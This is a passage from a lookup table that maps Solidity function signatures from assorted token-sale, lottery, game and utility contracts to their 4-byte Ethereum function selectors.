"0xaef0004a", "onlyFounders()": "0xa6aa7f7a", "planCount()": "0x382d39bb", "amountRaisedInUsdCents()": "0x7968196c", "claimG()": "0x5f61bf99", "countdownDecrement()": "0x45426082", "discountSaleEnd()": "0x61a65e2a", "mStopped()": "0xadce80d5", "getThirdPhaseCap()": "0x7f2b88ea", "advisorSecondLockTime()": "0x6b3c9757", "PRESALE_PRICE()": "0x62dc6e21", "earlier()": "0x66fbc154", "refRewardL1Per100()": "0xed7f8deb", "newowner()": "0xd74afaa1", "checkOutstandingQueries()": "0x1e02bf62", "game_paused()": "0x2b70faf1", "upgradeTimestamp()": "0x921bd6f0", "oracleCallbackGasPrice()": "0x70cbed78", "CUSTOMER_PERCENTAGE()": "0x21774f4b", "raceId()": "0xed3a865e", "investedWei()": "0xe9149e34", "multisigwallet()": "0xe48d81a8", "crowdSaleOpen()": "0x6009eed3", "initCanOffsetTime()": "0x35ee2f8a", "minBidPercentage()": "0x23f1dbe0", "wagerPool13()": "0xb15a72d8", "DonQuixoteToken()": "0xf2b45ec5", "nominalValue()": "0x9bb04895", "mSumRawSpeed()": "0xe4027126", "alreadyWithdrawn()": "0x724df10a", "scamSealTokenAddress()": "0xab3a39c2", "icoWallet()": "0x22287914", "Show_the_name_of_Option_A()": "0x5a37ae58", "toUint(int256,string)": "0xdb08444a", "toLower(string)": "0x9416b423", "toUpper(string)": "0x62dd748c", "toChar(bytes1)": "0xfaacf0fd", "addrToAsciiString(address)": "0x0b0bbd65", "storageToUint(int256,string)": "0x7888e957", "keyExists(string,string)": "0x528a683c", "getArrayValueByKey(string,string)": "0xd2de6cca", "getIntValueByKey(string,string)": "0xbf466c06", "getStringValueByKey(string,string)": "0x29caf0c9", "toKeyValue(string,string)": "0xc0e71f54", "toAddress(string)": "0x7e4115ba", "toHex(string)": "0x100bce92", "fromHexChar(bytes1)": "0x67b78d00", "toInt(string)": "0x303b5d3b", "indexOf(string,string,uint256)": "0xba7325be", "trim(string,string)": "0xefcf2479", "trim(string)": "0xb2dad155", "concat(string,string,string,string)": "0xd8e5c797", "concat(string,string,string)": "0x4874e62d", "substr(string,uint256,uint256)": "0x39c27bd4", "equalsNoCase(string,string)": "0x9f020d3a", "equals(string,string)": "0x88d8da5f", "compareNoCase(string,string)": "0x4db61d21", "length(string)": "0x436a66e7", "destroy(address[])": "0xc6786e5a", "TokenDestructible()": "0x0d7f7eff", "winnerName()": "0xe2ba53f0", "verify(uint8)": "0xb2225351", "setPod(address,uint8)": "0x1089b16e", "agreeFromPod()": "0x2f554d53", "agreeFromDrone()": "0xc12e760e", "future()": "0xa2ec258f", "triggerLibraryEvent()": "0xe508202d", "autoBurn()": "0xa63b91f4", "giveAwayInProgress()": "0x5ef2a3f4", "checkGivenAway()": "0xebadfd3d", "openGiveAway()": "0x77e2a6ed", "closeGiveAway()": "0x0aca08ca", "refundDonation(address)": "0x54e9d5e1", "tokenGiveAway()": "0x587695cd", "donation(address)": "0xf457ee5a", "claimTokens(uint256)": "0x46e04a2f", "getAvailableTokens()": "0xe35568cb", "changeToken(address)": "0x66829b16", "VestedPayment(uint256,uint256,uint256,uint256,uint256,address)": "0x7ea11880", "getPersonaAttributes(address)": "0x97df212b", "setPersonaAttributes(bytes)": "0x1b6caad9", "PersonaRegistry(address)": "0x9fafcf72", "setGlobal(uint64,bool)": "0xc4bc7b70", "hasBase(address,uint64)": "0x225b6574", "unsetBase(address,uint64)": "0xb7d4dc0d", "setBase(address,uint64,bool)": "0xdbd4a8ea", "hasRole(address,bytes32)": "0xac4ab3fb", "removeRole(address,bytes32)": "0x6853920e", "addRole(address,bytes32)": "0xa73f7f8a", "GetUserConAddr(string)": "0x8ad9c8c3", "CreateUser(string)": "0x6b76bd94", "UserList()": "0x68ff8c4c", "faucet(uint256)": "0x57915897", "LegacyReputationToken()": "0x65d7d3d0", "checkPassed(address)": "0x9f881f46", "setClue4(string)": "0xb46e42ec", "setClue3(string)": "0x499a8fea", "setClue2(string)": "0xa8ccef6c", "setClue1(string)": "0xbeb6422f", "getClue4()": "0x88e2ca21", "getClue3()": "0x2878d3a7", "getClue2()": "0xa33467cf", "getClue1()": "0x8d7e5be0", "ConstructBitcoinClue(bytes32,bytes32,bytes32,bytes32)": "0x94beb9b2", "votingWeightOf(address,uint256)": "0x60dddfb1", "widthrawBondFunds(address)": "0x9c8f94bd", "canPropose(address)": "0x42b4632e", "canVote(address,uint256)": "0x19eb8d48", "hasWon(uint256)": "0x75eeadc3", "delegateVote(address,address,uint256)": "0xfc78b430", "depositBond(address,uint256)": "0x515053c6", "resignAsCurator(address)": "0x5190674b", "removeCurator(address)": "0x98f25c44", "addCurator(address)": "0x34f0e39e", "configureBoard(address)": "0x044553ae", "LiquidDemocracyRules(address,address[],uint256)": "0x20b2d97b", "testOne()": "0x4a8b2b27", "testSafeMul(uint256,uint256)": "0x9ee6ff70", "testSafeSub(uint256,uint256)": "0xec0da330", "testSafeAdd(uint256,uint256)": "0xde47864c", "TestUtils()": "0x3ac7fe84", "setPeriod(uint256)": "0x0f3a9f65", "TokenWithValidityPeriod(string,string,uint8,uint256,address,string,address)": "0xf9654378", "register(bytes32,bytes32,address)": "0x15d7bf44", "now()": "0x8abe09f2", "blockDotTimestamp()": "0x31a3b36f", "blockDotNumber()": "0xf979764d", "blockDotGasLimit()": "0xcf3ca0fa", "blockDotDifficulty()": "0x3db7a118", "blockDotCoinbase()": "0xb1f99cd5", "blockDotBlockHash(uint256)": "0xaa4ce2c6", "createTokenContract()": "0xd5d21e18", "SampleCrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0xecedafcb", "yearteam_trade_date()": "0x784ba0f5", "tokenCreationInit()": "0x2c089048", "totalNumberOfTokensForSale()": "0x5e15d642", "Launch()": "0x02ac8168", "cumulativeRatios()": "0x781e9892", "futureExpanstion()": "0xc6f9defe", "nonPublicSupply()": "0xff91b949", "announcement()": "0x9f5755ae", "totalNormalCollected()": "0x1517d107", "advisorWallet()": "0x319db3be", "endOf24H()": "0x91cb4316", "houseCutPercentage()": "0xca1938e5", "durationBetweenRewardMints()": "0x2ac394a4", "newXPAAssets()": "0x8a8f5b79", "referrerAndOwnerPercent()": "0xdf1836ca", "ritualFee()": "0x0c932e77", "requiredGasPrice()": "0x10d92060", "minInitialMarginAmount()": "0x26e010c8", "participantClaimCredits()": "0xed33e00c", "earlyContribShare()": "0x8ddf52bd", "hashesUsed()": "0xb419dd2d", "tokensTotal()": "0x394610cf", "numTeamDeposits()": "0xa670c133", "HonestisnetworkICObalances()": "0x75b99fb1", "kycManager()": "0x7afea44f", "releaseTokenTime()": "0x364e74eb", "BuyPrice()": "0x9ab80f14", "endTimeMain()": "0xe4560388", "crosairShipMinted()": "0x3678f179", "realSupplyWeight()": "0x218d5637", "VREO_SALE_OPENING_TIME()": "0x99ce00a9", "reserveAddress()": "0xf79ed94b", "blockNumberUpdated()": "0x30b5198f", "ownerHashed()": "0xfc882dff", "finalizePublicSale()": "0x73eda3cc", "STAGE_2_FINISH()": "0x3591fadc", "rateT4T()": "0xbf2c7cbe", "eidooSigner()": "0x30ba2d4d", "BIGTTokenDeposit()": "0x3c2cf368", "credoEthExchangeRate()": "0x6e083bc7", "STANDARD_RATE()": "0x3deb23d2", "DEVP()": "0x9c2f4092", "bonusProgramEnded()": "0x23cba56f", "keepaliveBlock()": "0x80c6ff73", "minimumWitcoins()": "0x0fab0f6a", "unlockDate()": "0x69ac5721", "ARTWORK_STARTING_PRICE()": "0x0d955209", "UNICORN_ID()": "0xd47510c0", "dataContract()": "0x0d668818", "getProjects()": "0xdcc60128", "TVCrowdsaleContract()": "0x849d0d24", "candidateTillExchange()": "0xd4ed2cf5", "updateUSeqvol()": "0xe8f35f2c", "durationCrowdSale()": "0xef02d5d6", "VOTING_PREPARE_TIMESPAN()": "0x674942eb", "BNB_MIN_CONTRIB()": "0xdfb3557b", "lastBlock_f1()": "0xa9d4d6bc", "sspRegistry()": "0x3ee066e5", "totalAmountOfWeiPaidToUsers()": "0x39f47875", "tdeDuration()": "0xa3273535", "CONTRACT_NAME()": "0x614d08f8", "upgradeAddr()": "0x13d59ca9", "CIR_SUPPLY()": "0x048bbc72", "Chain3()": "0x1b44f449", "MAX_SALE_VOLUME()": "0x9a586d26", "Presale1Sold()": "0x7911d80a", "totalBurn()": "0x3c9f861d", "deployAgentWallet()": "0xfbd1eb7b", "lotteryFinished()": "0x61a25f07", "profitFromCrash()": "0x719874da", "tokensToSell()": "0x3d956691", "maxOpenAttacks()": "0x11bbdf53", "getNodalblockURL()": "0xe8aca672", "ownerWithdrawFees()": "0xd185c583", "totalWeiVolume()": "0x50cc5d4b", "allocateBounty()": "0x22f872a7", "CROSAIR_VOUCHER_PRICE()": "0x382d606b", "lastInitTimestamp()": "0x02baaf40", "totalWeiRaisedDuringICO1()": "0x72317e7b", "dasToken()": "0x6f5e7398", "managedTokenLedger()": "0x42e15c74", "ENDTIME()": "0x850d9afb", "startPreICOStage3()": "0xc85234c7", "_myinitialSupply()": "0xdc9c6e15", "masternodeRegister()": "0x83a7b701", "ballot()": "0xac3910a2", "ICO_Finished()": "0x6ea3b6d1", "MINIMUM_INVESTMENT()": "0x8a4660fe", "buyPriceFinal()": "0x30da4684", "ICOPERIOD()": "0x05f908e6", "factorial_ICO()": "0xa6b11fb3", "ICO_TEAM()": "0x88400fbe", "databaseDownloadUrl()": "0x3463d76d", "gamePlayerNumber()": "0x32145dd2", "totalTokensCrowdSale()": "0xa25277f3", "traded_token_is_seeded()": "0x6f18d3f5", "tokenCapPhaseTwo()": "0xc384521f", "getArrayInfoForDepositCount()": "0x6fbdae47", "piTokensForSale()": "0x8f94f6a0", "total_tokenwei()": "0x10c193b9", "SetWorldSnapshot(uint256,bool,uint256,uint256,uint256)": "0xec7bf78d", "SetWorldData(uint256,uint256,uint256,uint256,uint256)": "0xa82970d7", "GetWorldData()": "0x3bb8da29", "CreateCityData(address,uint256,uint256)": "0x52159bcf", "IsCityNameExist(bytes32)": "0x57989b4c", "IsPlayer(address)": "0xe5104307", "compareLeaf(uint256,uint256,uint256,uint256)": "0xe09d0b75", "ConnectLeaf(uint256,uint256)": "0xd6dd1f0f", "RemovePlayer(address)": "0x34aeefd5", "RemoveRank(uint256,uint256)": "0xa94c468d", "InsertRank(uint256,uint256,uint256)": "0x5b284ecd", "findIndex(uint256,uint256)": "0x7a2b78e5", "adminResetRank()": "0x04d742dc", "adminSetCity(address)": "0x70d01861", "adminSetAdmin(address)": "0x15fb2185", "UpdateRank(address,uint256,uint256)": "0x61b65fbe", "GetRank(uint16)": "0x8bcf649d", "GetDemolishCost(uint256,uint256)": "0x254d2e12", "GetUpgradeCost(uint256,uint256)": "0xf26e5e85", "GetConstructCost(uint256,uint256)": "0x1c606dd3", "GetBuildingParam(uint256)": "0x432a89aa", "SetBuildingDataArray(uint256[])": "0xddb9341b", "SetBuildingSale(uint256,uint256,uint256,uint256)": "0x4a35d3ba", "SetBuildingData(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xcffc9997", "GetBuildingData(uint256)": "0x66605c47", "GetLandData()": "0x068c8e61", "SetCreditsPerEth(uint256)": "0x603c5e52", "GetCreditsPerEth()": "0x5f9094f5", "SetInitData(uint256,uint256,uint256,uint256,uint256)": "0x24b492d7", "GetInitData()": "0xbf463341", "GetVersion()": "0xc6129a5a", "SetAdmin(address)": "0x5a272403", "muldiv(uint256,uint256,uint256)": "0xb3947c17", "KungfuToken()": "0xf94789bf", "BTFM()": "0x46822869", "DeltaToken()": "0xdc80aaee", "PayWinners(address,address,address)": "0x6a50e3df", "changERC20(address)": "0x3bf13ded", "ExKnox(address,address)": "0x9cc24569", "massRevoke(address[])": "0x222b0d7d", "massGrant(address[])": "0x4081c065", "setPositionPrice(uint256)": "0xdc2424fc", "setAvailablePositions(uint256)": "0x8ceaa23f", "getMinPurchase()": "0x0f3d8803", "getPositionsAndTokensCnt(uint256)": "0xa9414cc3", "SmartCityCrowdsale(address,address,address,uint256)": "0xe3a2a327", "ceilDiv(uint256,uint256)": "0x9cb35327", "startPublicSale()": "0x0c1c972a", "changeBonusIncreasePercentage(uint256)": "0x2d897146", "updateWhitelist(address)": "0x3d0f963e", "setOperatorAddress(address)": "0x2f1d5a60", "isOwnerOrOperator(address,address)": "0xdbe6c02f", "SimpleMultiSigWallet()": "0xce1cf229", "GUIDEToken()": "0xeb85c61e", "getVestingsCount(address)": "0x9c81a5f6", "getVestingCreatedAt(address,uint256)": "0x2d46a9ce", "getVestingReleaseInterval(address,uint256)": "0xf14ca7d7", "getVestingReleaseRate(address,uint256)": "0x063cfaf0", "getVestingAmount(address,uint256)": "0xdd75ecce", "setFaucetThresholdSecs(uint256)": "0xd5a841f9", "faucet(address,address)": "0x7535679a", "_take0xTrade(address,uint256,address[5][],uint256[6][],bytes)": "0xbf8ce97f", "approveFor(address,address,uint256)": "0x2b991746", "set0xTokenProxy(address)": "0xed5c58f3", "setZRXToken(address)": "0x44292e88", "set0xExchange(address)": "0x21938610", "getSignatureParts(bytes)": "0xe729ebe8", "getOrderValuesFromData(bytes)": "0x79480a4c", "resolveExchangeAddress()": "0x7531e032", "KyberHandler(address,address)": "0x0aefc573", "BTB()": "0x46caf5e8", "getMotPrice(bytes32)": "0x670c00d0", "payFee(uint256)": "0xd289ade2", "setMotAddress(address)": "0xc892693b", "setWalletId(address)": "0x46479541", "adjustFeePercentage(uint256)": "0x280dd460", "adjustFeeAmount(uint256)": "0x977919bf", "getComponentByName(string)": "0x648aa3b1", "setComponent(string,address)": "0x1d16d1bb", "transferToAddress(address,uint256,bool)": "0x8aa14a07", "approveAndCustomCall(address,uint256,bytes,bytes4)": "0x7e3da027", "SIGMA()": "0x860bb34a", "Alpha()": "0x37d4fc84", "BBY(uint256,string,string)": "0x6528ef46", "RedCarpetToken()": "0xb3ad4600", "G12Coin(uint256,string,uint8,string)": "0xa017ed35", "QNBAI()": "0xf8fc6fcd", "requestArbitration(bytes32,uint256)": "0xa829c3d1", "notifyOfArbitrationRequest(bytes32,address,uint256)": "0xf6a94ecb", "Totti(string,string,uint256,uint256)": "0x7ade8d6a", "buyOne(address,address,uint256,bytes)": "0x18c1fc68", "buy5(address[],address[],uint256[],bytes,bytes,bytes,bytes,bytes)": "0x20bb280b", "buy4(address[],address[],uint256[],bytes,bytes,bytes,bytes)": "0xd5387acb", "withdrawAll(address,address[])": "0x4f71473e", "withdrawInternal(address,uint256,address[],uint256[])": "0xb0acde14", "allBalances(address,address[])": "0x66e8cd81", "registerNameXnameFromDapp(address,bytes32,bytes32,bool)": "0x745ea0c1", "registerNameXaddrFromDapp(address,bytes32,address,bool)": "0xaa4d490b", "registerNameXIDFromDapp(address,bytes32,uint256,bool)": "0xc0942dfd", "getNameFee()": "0x2614195f", "horas()": "0x827ffcea", "deathData_v7()": "0xc0cf067b", "secondBonusRate()": "0x41300d03", "fact()": "0x73e3ce80", "ownerBank()": "0x7a6838ec", "NATIVE_ASSET()": "0xbf53253b", "canRecvEthDirect()": "0x69e2c927", "item()": "0xf2a4a82e", "Controller_Address2()": "0xc33818fd", "orePrice()": "0x9b2d2cbd", "totalSaledToken()": "0x60a22932", "BONUSONE_DATE()": "0x51ab351c", "JointICOContractAddress()": "0xe38c4585", "level_6_percent()": "0xfac6fe0c", "PRICE_RATE_FOURTH()": "0xf4656219", "advisorsTokensHolder()": "0x78e7058e", "throwOnGasRefundFail()": "0x754efc98", "fundraiseType()": "0xd0d832ad", "adminAddressForComissions()": "0xbf81765c", "totalJackpotOdd()": "0x33cd7ede", "TOTAL_CROWDSALE_FUND()": "0xbf251e7f", "currentCoinsCreatedInteger()": "0x8dc850dc", "whiteListEnabled()": "0xe2e616bb", "TEAM_ADDR()": "0x0b00fd54", "swpFundDeposit()": "0xe388cbb9", "lastRelease()": "0x180b2607", "totalEgg()": "0xfdb4dbe0", "description3()": "0xccb22e37", "upgradeHasBegun()": "0x7529b1d9", "round4TokensRemaning()": "0x64cd4a1a", "RegCost()": "0xb0a8be37", "bnbRaised()": "0xd47a2010", "maxContributor()": "0xb14537b0", "bonusEnds5()": "0xa660f827", "sellWei()": "0x190bfea8", "getIncentiveNum()": "0xa1ce5ba7", "send_all()": "0x2193cdba", "firstRoundCosmosTokensLimit()": "0x55e21474", "salt()": "0xbfa0b133", "maxTokenSupplyICO1()": "0xf4b2f5b6", "MINBET_perROLL()": "0xcf4315bb", "fstTotalSupply()": "0x9b1d767f", "min_amount()": "0x72a85604", "lpTargetPosition()": "0x7489308f", "game_token()": "0x1475e751", "txFeeDenominator()": "0x49bfb061", "tokenSupplyBackedByGold()": "0x949cc9ea", "isTransferEnable()": "0xb9deb729", "getCurrentTokenPriceWei()": "0x076e18a0", "pastTenMinutes()": "0x3afbf039", "BetOverlap()": "0x7d606100", "window1TokenExchangeRate()": "0xa7d30400", "gracePeriodAfterRound0Target()": "0x6ddc7e65", "_lotterySupply()": "0x1fbcf2c1", "secondStageDuration()": "0x65794de3", "getIcoTokenHoldersAddressesCount()": "0x133af8b3", "burnMax()": "0x5c131d70", "CROWDSALE_REWARD_WALLET()": "0x8f535904", "executeConstant()": "0x63beeab1", "TOKEN_SECOND_PRICE_RATE()": "0xc85c11eb", "totalDeveloperCut_()": "0x85349e01", "priceCounter()": "0xdc7cbfab", "MIMIMUM_CONTRIBUTION_AMOUNT_PREICO()": "0x272ae0b5", "maxForceOffsetAmount()": "0xb5afd61b", "setTokenControlInfos()": "0x4a4baed7", "tokensSoldAmount()": "0xa4a75c6e", "Menu04()": "0xb36af005", "lastmoney()": "0x6f00ad8a", "IcoEndDate()": "0x66fe25a0", "collectedFunds()": "0x64256611", "PrivateSaleCents()": "0x3207408f", "BONUS_SCALE()": "0x07bf9b9f", "bountyFundAddress()": "0xe1da4135", "contributionCapInWei()": "0x08998acb", "isInitialSupplied()": "0x5e2642c9", "endThirdWeek()": "0xb99de11e", "tokensForOneEther()": "0x777eceb8", "presaleDiscount()": "0xa99aa366", "winnings()": "0xd134474c", "AsterionWorldToken()": "0x8995305e", "claimTokenWindowOpen()": "0xa94feacc", "the_address_for_option_A()": "0xa0e8b6b0", "Message_To_Investors()": "0x9522ca89", "bonusDayPercent()": "0x10971bee", "treePot()": "0x9e987b20", "getFlagPrice()": "0xb8b23120", "cycleEndTime()": "0x844c4264", "GBPValue()": "0x1e9e928e", "MineBlocksAddr()": "0x76fee8e0", "previousContractAddress()": "0x93fffddc", "tokenPartner()": "0xdcb4775e", "landManagement()": "0x76cc1c5c", "bankersLimit()": "0x949eb1c6", "ownerWithdrawn()": "0xc20615ed", "mdtTeamAddress()": "0x3b6d05c7", "leftToday()": "0x3c594844", "purchaseStartBlock()": "0xcc72ecb0", "STAGE_TWO_TIME_END()": "0x6698baaa", "ethers_collected()": "0x2965fa54", "founderPercent()": "0x2bed69e0", "Bankroi()": "0x8d56bc62", "publish(string)": "0x243e280b", "Cryptolotto7Days(address,address,address,address)": "0x8e22e8de", "calculateReferral(uint8)": "0x4a6e2ffe", "getSalesPartnerAmount(address)": "0x8e3dbf53", "getPartnerAmount(address)": "0x421e2dc2", "transferToSalesPartner(address)": "0x019b32ad", "transferToPartner(address)": "0x1d0ba36e", "processReferralSystem(address,address)": "0x4b803095", "pickTheWinner()": "0xf7defe8c", "randomNumber(uint256,uint256,uint256,uint256,uint256,bytes32)": "0x8897c1f4", "getGameJackpot(uint256)": "0x16521a2b", "getPlayersInGame(uint256)": "0x74796cc2", "Cryptolotto1Hour(address,address,address,address)": "0x3bffb839", "YeYingOil()": "0x6dd186c4", "_determinePid(address)": "0x9a29ccf7", "_giveToken(uint256,uint256)": "0x7180dd8a", "_buyToken(uint256,uint256,uint256)": "0x36c61b60", "_startRound()": "0xe416f6b4", "_endRound()": "0x2317cd54", "invite(uint256,uint256,uint256)": "0xf318cc4a", "rebuy(uint256)": "0x48ff1387", "withdrawShare(address)": "0x1027853f", "getRoundAwardTicketNum(uint256)": "0xbaf9d0cf", "divUp(uint256,uint256)": "0xcbe8623f", "_checkItemId(uint256)": "0x09dfe330", "itemsRange(uint256,uint256)": "0xf0072795", "itemOf(uint256)": "0xfb048705", "ownerInfoOf(uint256)": "0x68342b33", "sellPriceOf(uint256)": "0xa8f0e6e2", "setIdRange(uint256,uint256)": "0x67fdd509", "changeOwnerInfo(uint256,uint256,string,string,string,string)": "0xc4259e2e", "changeItemName(uint256,string)": "0x5b525b2c", "buy(uint256,uint256,string,string,string,string,string)": "0xb00a81fb", "newItem(uint256,string,uint256)": "0x2150c75d", "addItem(uint256,string,uint256)": "0xb776fc15", "xhstoken()": "0x8a4a9aab", "EBLLToken(address,uint256)": "0xfb357f74", "Decenturuon()": "0x02940dbb", "MIATOKEN()": "0xf83c6f64", "lengthOf(string)": "0x495bf26b", "uppercaseOf(string)": "0x36281b38", "keyOf(bytes32,bytes32)": "0x95c6fa61", "bnOf(bytes32,bytes32)": "0x24378482", "bidOf(bytes32,uint256)": "0x67e8cd0f", "totalBatchOf(bytes32)": "0xdf2bf12b", "mfrOf(bytes32)": "0x4c0b2973", "midOf(uint256)": "0x0a5de7bb", "check(bytes32,bytes32,bytes)": "0x535e401c", "lock(bytes32,bytes32)": "0x9314be9d", "setKey(bytes32,bytes32,bytes)": "0xcd5acd4d", "setBn(bytes32,bytes32,string)": "0xb68e8760", "push(bytes32,string,bytes)": "0xfb8621df", "changeStarbitWallet(address)": "0x03e93b2e", "calculateObtainedSBT(uint256)": "0xf1fbf2a3", "setNonce(string,uint256)": "0xbb28c3f2", "generateWithdrawalHash(string,uint256,address,uint256)": "0xfe44a664", "redeemWithdrawalCertificate(string,uint256,address,bytes)": "0xb6fb9f25", "TRCERC20(uint256,string,string)": "0xf44bd811", "Start_quiz_g(string,string)": "0xd735875d", "BlokGrup()": "0x261775f6", "PayToken()": "0xf60f49bb", "iSportNews()": "0x02c1d7cf", "getMiningWarRoundNumber()": "0x15a090c0", "getMiningWarDealine()": "0x075865c4", "calculateShareCrystal(uint256)": "0x48a8b427", "updateShareCrystal()": "0xad1c5d6c", "endMiniGame()": "0x35c6511b", "startMiniGame()": "0xc5b7589c", "setupMiniGame(uint256,uint256)": "0xbe7ccd7e", "setDiscountBonus(uint256)": "0x75f289bc", "addCrystal(address,uint256)": "0xf6e212ea", "ABBC()": "0xfa5e288c", "absolutCBD()": "0xdf43b830", "ETC()": "0xd597b634", "HealthyCoins(string,string,uint256)": "0xa9804acb", "emptyWrongToken(address)": "0xd7290181", "getGameAddressById(uint256)": "0xd36bed21", "getGameIdByAddress(address)": "0xc1aa5d98", "getPlayerRefById(uint256)": "0x690fa5df", "getPlayerAddressById(uint256)": "0x9015e1dc", "getPlayerIdByAddress(address)": "0xa59eca54", "addPlayer(address,uint256)": "0x6fd075fc", "isHuman(address)": "0xf72c436f", "genericCall(address,bytes,address)": "0x20204fb7", "getGlobalConstraintParameters(address,int256,address)": "0xe0e34e06", "genericCall(address,bytes)": "0x4650c308", "claim(address,uint256,uint256,uint8,bytes32,bytes32)": "0x0d48a771", "verifiedAttributes(address)": "0x767a11ca", "hasVerifiedAttributeValue(address,uint256)": "0x2652c0f4", "hasVerifiedAttributeIndex(address,uint256)": "0xdcf9bbec", "hasValidProfile(address)": "0xe9653482", "setAuthorityContractAddress(address)": "0x950ef8c7", "SingleSourceIdentity()": "0x9c7b7a2d", "chargeVerificationFee(address,address)": "0x893cf478", "isValidAuthority(address)": "0xdbf2c9da", "isValidAuthority(address,uint256)": "0x9d09390b", "transfer(address,address,address,address[],uint256,uint256)": "0xe8fac4cd", "setDemocAdminEmergency(bytes32,address)": "0xfed9981e", "setDex(address)": "0x447fa8b7", "getMax(uint16[])": "0x46ffdfbc", "tokenIcoAllocated()": "0x0da9e3d7", "manuallyEnded()": "0x53b382ea", "FOUR_YEAR_KEEPING()": "0x1f3a7c0b", "yearOneMultiplier()": "0xbd338d85", "founderTokensVested()": "0x7c99922d", "partnersWallet()": "0xa945f90f", "resign()": "0x69652fcf", "TestTalk()": "0x54ce7616", "CRAWDSALE_START_DAY()": "0xb06fd1e3", "startproduction()": "0xab51937b", "maximumValueWithoutProofOfAddress()": "0x80e47e71", "logic_contract()": "0x4de94320", "tokensForParnter()": "0x06eeaba0", "BURN_ADDRESS()": "0xfccc2813", "_maint_EndPromo()": "0xbe8360c5", "lucky_number()": "0x4d94994c", "endTimeStamp()": "0x51906bb0", "block3()": "0x705a3644", "maxDonationInWei()": "0x8c7e5008", "baseExchangeRate()": "0x65676c9e", "stepOneRate()": "0xe44bc43f", "numberRange()": "0x358f7f3a", "generalSaleStartDate()": "0xf069629c", "RESERVED_TOKENS_ANGLE()": "0x0c0078e8", "deposited()": "0xeef49ee3", "seriesFactory()": "0x237548fa", "transactionsActive()": "0xc69e06db", "ICOBonusPercent3week()": "0xb3215499", "ICOendtime()": "0xeafac339", "totalTokensForSaleDuringICO4()": "0x113d1975", "Revision()": "0xcb5829ab", "jackpotProportion()": "0x8090d83c", "edoPerWei_()": "0xf673745a", "founderTokenUnlockPhase3()": "0x5974ec50", "finalTokenExchangeRate()": "0x6953ace4", "presaleFee()": "0x221a66d9", "RATE3()": "0xf2b40209", "tokensBounty()": "0x730369a7", "tokenFrozenUntilTime()": "0xd4597aa1", "donationNum()": "0x127dd730", "realEtherCapHash()": "0xaa4bdd3b", "claimHeldBalance()": "0xde81333e", "maxPresaleWei()": "0xd4b71aa9", "resetToken()": "0x24b1bfdf", "RESERVED_TOKENS_FOR_CYNOTRUST()": "0xecaeacf6", "honourWhitelistEnd()": "0x66c630bc", "stageSupply()": "0x09358584", "coreTeamMemberTwo()": "0xd9386789", "usd()": "0xd63a6ccd", "create_price()": "0x5d5e507b", "ownerCandidat()": "0x4c480c2a", "IcoClosedManually()": "0x904b67c2", "sumWei()": "0x6da1d37a", "result_votes()": "0x9451bca7", "CROWDSALE_REWARD_TOKENS_NUMS()": "0x2dd81ed3", "doomsday()": "0xacd105d1", "refundFees()": "0x2b1dd8da", "remainingCats()": "0x196ee9c7", "walletTwo()": "0x2594b343", "contractorsProfitAddress()": "0xb7e5cabb", "minCDTToParticipate()": "0x04ed6fbc", "investBalanceMax()": "0xc4164365", "tournamentJackpot()": "0x6b3a8e90", "waiting()": "0xb405c549", "lambosTuneCount()": "0x0668f649", "PLAYER_START_PERIODS()": "0x95fc6354", "communityReservation()": "0x7a740a68", "CrowdsaleAddress()": "0xe34dd755", "bonusLevel1PercentModifier()": "0xdebaeb0e", "totalNumberOfPurchases()": "0x4082b499", "getNeighbourReward()": "0x5db8f084", "phase7Price()": "0x5e403a9c", "tokensPerUSD()": "0x115f2f2f", "RATE_PRIVATE()": "0xf53bde25", "endTimeTwo()": "0x543b4f6f", "deathData_a16()": "0x2316d0cd", "round1Bonus()": "0x020acb6a", "getNumberOne()": "0x90949f11", "distributionClosed()": "0x259653b8", "remainigTokens()": "0x9fabf4da", "burnIcoTokens()": "0x30140053", "VESTED_AMOUNT_TOTAL()": "0xc037ae58", "fetchdivstopot()": "0x8350dfaf", "ticketHolder()": "0x81f4f9bf", "pvt_plmt_token_generated()": "0xf9084729", "unlockSecondary()": "0x3899ad41", "tokensReleased()": "0x8a9e0876", "preDistriToAcquiantancesEndTime()": "0x9cf4910c", "AVAILABLE_AIRDROP_SUPPLY()": "0x162cbefe", "vminEtherPerPurchase()": "0x69f95967", "endedGameCount()": "0x43aa8784", "totalLotteryNumber()": "0xc4bde5e1", "oraclizeGasCost()": "0xe94233f6", "max_supply()": "0x8a333b50", "holdMax()": "0xdea89056", "divpaid()": "0x2eb255ec", "ETH_EUR()": "0xf8c439dc", "_v()": "0xc2c3bd6a", "ambassadorMode()": "0x8dd6908e", "XdacTokenCrowdsale(address,uint256[],uint256[],uint256,uint256)": "0x14af0908", "withdrawOtherEDEX(address)": "0x131e03ba", "eighth_withdrawal(uint256)": "0x854f3988", "seventh_withdrawal(uint256)": "0x3f1f8f68", "sixth_withdrawal(uint256)": "0x2aaef20c", "fifth_withdrawal(uint256)": "0x39ad8847", "fourth_withdrawal(uint256)": "0x950b550a", "third_withdrawal(uint256)": "0x36249140", "second_withdrawal(uint256)": "0xdec18b46", "first_withdrawal(uint256)": "0xc289dbe8", "initial_withdrawal(uint256)": "0x5ce885ee", "nextPhase()": "0x3eadb6db", "grantVestedEDEX(address,uint256)": "0x22bdf293", "agentPermission(address)": "0x1f46eb98", "changeRegulatorStatus(uint8)": "0x1667d763", "changeRegulator(address)": "0x08528190", "changeAgentPermission(address,uint8)": "0x0af6f6fe", "ERC20TokenCPN()": "0x91057f53", "CryptoCollectorContract()": "0xd9df2878", "GetWildCardOwner(uint256)": "0x58a79319", "numberOfTokens()": "0xf9f16ef2", "tokenTransfer(address,uint256)": "0x68cdafe6", "_createToken(string,string,string,uint256,address,uint256,uint256)": "0x8fa56215", "getTotalCategories()": "0xd8844241", "addCategory(string,uint256)": "0x035502f2", "adduser(string,string,address)": "0xff3c9472", "totUsers()": "0x538e0ff4", "unsetWildCardToken(uint256)": "0x2f0746bf", "IsWildCardCreatedForCategory(string)": "0x5a8b55e2", "setWildCardToken(uint256)": "0xd263d2a4", "makeWildCardToken(uint256)": "0x78030b83", "getkillerPriceConversionFee()": "0xd24999ca", "createToken(string,string,string,uint256)": "0xefbe8fd1", "setHost(address)": "0xc85e0be2", "extGoalReached()": "0x81b3171c", "supplyICOContract(address)": "0xdf3c5a42", "burnRestTokens()": "0x4438cf6f", "changeTreasury(address)": "0xb14f2a39", "burnMyBalance()": "0x7f3a98b7", "IconFoundation()": "0xc3a5fc4d", "CashTCoin()": "0x99fe6c88", "LademiA()": "0x9f9ae633", "agencyOf(address)": "0x93b8386d", "Agencies()": "0x77bc57e7", 